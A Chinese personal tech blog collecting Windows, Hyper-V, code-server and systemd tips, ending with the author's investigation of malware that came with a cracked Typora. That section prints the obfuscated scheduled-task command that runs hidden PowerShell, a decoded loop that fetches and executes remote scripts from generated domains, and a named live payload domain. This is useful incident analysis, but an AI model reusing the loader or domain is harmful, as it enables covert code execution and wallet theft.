TAP作为一款轻量化的Windows虚拟网卡，在许多场景下都有广泛应用，比如远程连接私有网络，或者游戏加速一类的。

然而让人恼火的是，在新版的Windows中，在使用无线网卡的时候，关闭TAP相关服务后无线网会自己断连，然后断连后还不会再次加入同一个网络，也就是说一定要自己手动去点一次连接网络才行，非常麻烦。然而由于看不出关键信息，不知道具体是哪个地方引起的wifi断连，一直都没能找到一个令可用的解决方案。

然而苍天不负有心人，近日随手一搜，发现两个月前有人遇到了相同的问题：https://learn.microsoft.com/en-us/answers/questions/1047476/what-is-the-cause-of-34wlan-autoconfig-detected-li.html

解决方法很简单，创建一个DWORD类型的注册表项

HKLM\SOFTWARE\Microsoft\WcmSvc\EnableBadStateTracking

，并将值设置为0即可。

简单来讲，原理似乎大概是，断开TAP网络的短暂时间内，系统发现当前连接的无线网络无法正常连网，于是通知驱动重新配置网络。而可能intel的驱动恰好采用了重启网卡的方式来重配网络，导致网络断连，并且受到WLAN AutoConfig的阻止，无法重新连接到之前认为不能联网的网络。而该注册表项的功能则是告诉WLAN AutoConfig服务，即使连不了网也不要自作主张通知网卡切断网络，因而避免了断连的问题。

之前因为不熟悉Hyper-V，有些功能不会用，因而一直在说 不要使用Hyper-V，会变得不幸 。由于最近需要一个vscode来读代码，在被RK3328+eMMC这种更加不幸的组合折磨之后，决定回过头来看看能不能把之前遇到的问题解决。功夫不负有心人，误打误撞之下，最终还是找到了解决方案。

前情提要：Hyper-V自带了一个用于虚拟机与主机通信的默认交换机，但是该交换机不支持网段配置，每次重启会在10.0.0.0网段下随机选一个子网段给当前DHCP用于分配IP。于是为了获得可以稳定访问的虚拟机IP，就不能使用默认交换机，必须自己单独配一个固定网段，然后给虚拟机分配静态IP。

然后又来到了万能的StackOverflow：网友指出，在已经启用了Hyper-V的情况下，通过PowerShell调用系统接口，可以创建指定网段的NAT，无需配置网关即可访问外网，具体步骤如下：

New-VMSwitch -SwitchName "SwitchName" -SwitchType Internal
Get-NetAdapter       // (note down ifIndex of the newly created switch as INDEX)
New-NetIPAddress -IPAddress 192.168.0.1 -PrefixLength 24 -InterfaceIndex <INDEX>
New-NetNat -Name MyNATnetwork -InternalIPInterfaceAddressPrefix 192.168.0.0/24

其中关键在于最后一步New-NetNat。前面几步分别可以通过在Hyper-V图形管理界面中新建虚拟网卡，以及直接在控制面板中修改对应虚拟网卡的IP完成。

创建完虚拟NAT并修改虚拟网卡的IP之后，在虚拟机中配置静态IP，并将网关设置为主机的虚拟网卡IP，就可以实现虚拟机连通外网了。

这里顺便说一下Hyper-V中的三类虚拟网卡，这篇文章及其配图做了一个还比较好的解释。三种可以在Hyper-V中创建的虚拟网卡分别是外部、内部和私有网卡，特征大致如下：

• 外部网卡(External)：虚拟机直接连通外网，虚拟机与主机处于同一网络层级（都直接获取上层路由器的IP，如果是需要登录的网络，则相当于使用了新设备，需要重新登录）；
• 内部网卡(Internal)：虚拟机只连通主机，不连通外网；
• 私有网卡(Private)：虚拟机间相互连通，不连通主机和外网。

需要注意的是，Hyper-V中只有默认的虚拟网卡才带DHCP，所有自己创建的虚拟网卡都是不提供DHCP服务的，只能配静态IP或者自己部署一个DHCP服务端。

之前由于没有搞清几类虚拟网卡的区别，一直在用外部网卡，加上恰好手头的网络是要登录才能使用的，折磨了老久都没用；然后换了内部网卡又不知道要配NAT，属实是十分的不幸了。

现象是找不到部分常见的插件，比如微软家的C/C++和Python插件等。

参考https://stackoverflow.com/a/37238623。原因是根据vscode协议，只允许插件在vscode内自由使用；而根据vscode开源代码独自构建的编辑器理论上已经不算vscode了，所以再用官方源的话就有吃官司的危险，因而大部分基于vscode的开源项目都采用第三方插件源代替微软的官方插件源，如openvsx等。

具体步骤：把下面这段配置贴到code-server的product.json文件中，作为最顶层元素添加即可（通常位于/usr/lib/code-server/lib/vscode/product.json）：

  "extensionsGallery": {
      "serviceUrl": "https://marketplace.visualstudio.com/_apis/public/gallery",
      "cacheUrl": "https://vscode.blob.core.windows.net/gallery/index",
      "itemUrl": "https://marketplace.visualstudio.com/items"
  }

完成添加后，重启code-server服务，再去插件区就能搜索到官方源的插件了。

2023.4更新

VSCode IntelliSense是个什么垃圾东西，食我vscode-clangd啦

最近在配服务器端的VSCode，该软件很贴心地提供了以当前用户身份启动服务端的功能，可以有效防止有意无意修改到本应处于隔离范围外的文件。

由于最近洁癖有点严重，想知道这功能是不是在包管理器脚本里硬写出来的，以及添加新用户时他还能否提供相同的便捷性，就简单刨了一下，发现它的service文件名有些特殊，叫做code-server@.service，与他提示用户可以创建的code-server@$USER.service只差一个$USER。

兜兜转转发现这是systemd的一种特殊用法，叫服务模板，而且填充在@后面的可以不仅仅是用户名，可以是任何声明需要的变量类型。由于本人目前还用不到，就暂时先码在这里，贴一个文档链接：https://www.freedesktop.org/software/systemd/man/systemd.service.html#Service%20Templates

没想到互联网老司机也有翻车的一天= =

前几天贪小便宜，发现typora的beta版本过期了，于是去一个平常十分信任的网站找了份破解版，然后就翻车了T T

起因是今天在编译东西的时候，管理观察任务管理器的时候发现多出一个powershell进程。因为平常不怎么用powershell，所以看到这进程还是十分敏感的，就右键看了一下等待链。结果不看不知道，一看吓一跳，分析结果说进程正在等待网络IO。当场就觉得不对劲了，用powershell执行本地程序还情有可原，这年头还会有哪家公司用powershell来做网络通信，大概率就是个人开发者了。

为了摸清楚这个powershell进程到底在干嘛，最为直观的信息就是它的调用链了。作为脚本语言，最大的好处就是其源代码往往具有一定可读性，对于伪装级别不高的脚本来说，摸到脚本本身大概就能知道它在干嘛了。

然而，切出任务管理器一看，命令行长这样：

PoWerShELl -wINDOWstYle hidDEN

一股浓浓的黑客风味扑面而来——虽然cmd和powershell允许大小写混用，但一般人为了可读性，哪会整得这样花里胡哨的？

伪装的还算好，脚本和参数可能通过管道传送，没有出现在命令行里，但这编程风格还是露出了鸡脚。怎么哪里都有小黑子（逃

接下来要做的就是顺藤摸瓜，找到究竟是谁调用的这个脚本，再把背后的真实脚本挖出来。这里用wmic命令来寻找应用的调用关系（https://stackoverflow.com/questions/7486717/finding-parent-process-id-on-windows）：

wmic process where (processid=PROCID_HERE) get parentprocessid

凭着pid一路顺藤摸瓜，找到了svchost.exe，右键转到服务一看，发现是计划任务。

然后来到控制面板中的计划任务，选到左边导航栏最顶部的元素任务计划程序（本地），再从菜单栏里的操作选择显示所有正在运行的任务。不消多看，为数不多的运行中任务里，只有一个任务名是奇奇怪怪的字符串，对应的命令是一个光秃秃的cmd.exe。

扒出来一看，完整的命令行长这样：

cmd.exe /C eCHo IeX "Icm ([SCRiPtbLoCk]::cREatE([sTriNg]::jOin('', ((geT-iTeMprOPeRTY -paTh 'HKlM:\SoftwaRe\KITwaREU5OEj').'u5oejUf' | % { [ChaR](`$_ -bXOr 236) }))))" | PoWerShELl -wINDOWstYle hidDEN

只能说味儿更浓了。

然后简单解释一下这串命令干了啥：从注册表取HKlM:\SoftwaRe\KITwaREU5OEj\u5oejUf项的值，逐字节与数236做异或操作（简单的字符串解码），然后做一个没什么鸟用的空字符串拼接，再包裹为一个可执行脚本块，然后使用icm（Invoke-Command）、iex（Invoke-Expression）命令让powershell执行这个代码段。最后为了隐藏这段代码，使用cmd的echo功能转化到管道输出，再通过管道拼接直接将脚本输入到新创建的powershell进程中；powershell进程再通过-WindowStyle hidden参数设置为无窗口后台运行。通过这个方式，完整地掩盖了要运行的真是脚本——我们到现在还不知道黑客打算执行什么。

在前面顺着pid找调用进程的时候，找到cmd.exe的时候是能看到这串命令的。因为恰好正在用cmake编译，当时还楞了一下，cmake原来还会调用powershell脚本的么= =

接下来就是解密真实脚本的过程了，大致工作就是从上面的cmd命令中，把到执行powershell脚本之前的一段截取出来，让他输出到命令行即可，在此就不展开讲了。（其中很怪的一点是，echo命令里用了`字符来保护$字符，但我印象中cmd的保护字符是^来着？）

结果在这里贴一下吧：

while ($true) {
  try {
        foreach ($c in (@("com", "xyz"))) {
            foreach ($a in (@("wmail", "fairu", "bideo", "privatproxy", "ahoravideo"))) {
                foreach ($b in (@("endpoint", "blog", "chat", "cdn", "schnellvpn"))) {
                    try {
                        $h = "$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).com";
                        $r = Invoke-RestMethod -Uri "http://$a-$b.$c/v2/B723B9C0-2A79-4F4D-9F9D-4DED94453BFB?v=newcounter2" -TimeoutSec 30 -Headers @{ Host = $h }
                        if ($r -ne '') {
                            sTaRt-jOb ([sCriptBlock]::Create($r)) | Wait-Job -Timeout 7200
                            break;
                        }
                    }
                    catch {
                    }
                }
            }
        }
    }
    catch {
    }
    Start-Sleep -Seconds 5;
}

这脚本写的还挺鸡贼，powershell解码出来一行只有一个字符，光是整理成可读格式都花了我不小功夫。

在脚本里面，黑客又做了一个2x10x10=200个网站的排列组合，每5秒钟访问一个，其中藏了一个真实的网站，访问后可以得到一段脚本，作者让他等脚本执行2小时，然后重新开始这个循环。

下下来看了一下，tnnd，这鸟人在系统里搜索区块链钱包，然后上传个人信息给服务器，怕是偷钱去了。还好不玩区块链。

对了，域名是bideo-cdn.xyz，有兴趣的可以自己下来看看。